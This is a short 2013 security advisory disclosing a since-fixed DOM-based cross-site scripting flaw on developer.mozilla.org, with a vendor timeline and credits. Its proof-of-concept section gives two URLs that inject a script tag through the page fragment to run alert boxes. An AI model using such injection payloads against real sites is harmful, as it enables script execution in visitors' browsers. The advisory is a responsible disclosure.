Advisory:		developer.mozilla.org - DOM based Cross-site Scripting vulnerability
Advisory ID:		SSCHADV2013-010
Author:			Stefan Schurtz
Affected Software:	Successfully tested on developer.mozilla.org
Vendor URL:		http://developer.mozilla.org
Vendor Status:		fixed

==========================
Vulnerability Description
==========================

The website 'developer.mozilla.org' is prone to a DOM based XSS vulnerability.

==========================
PoC-Exploit
==========================

//  SRware Iron 24.0.1350.0 & & Google Chrome 27.0.1453.93 Internet Explorer 10

https://developer.mozilla.org/en-US/docs/Code_Review_FAQ#'/><script>alert(8);</script>
https://developer.mozilla.org/en-US/docs/Code_Review_FAQ#'/><script>alert(document.domain);</script>

==========================
Disclosure Timeline
==========================

28-May-2013 - vendor informedon bugzilla.mozilla.org
12-Jun-2013 - fixed by vendor

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.mozilla.org
http://www.darksecurity.de/advisories/2013/SSCHADV2013-010.txt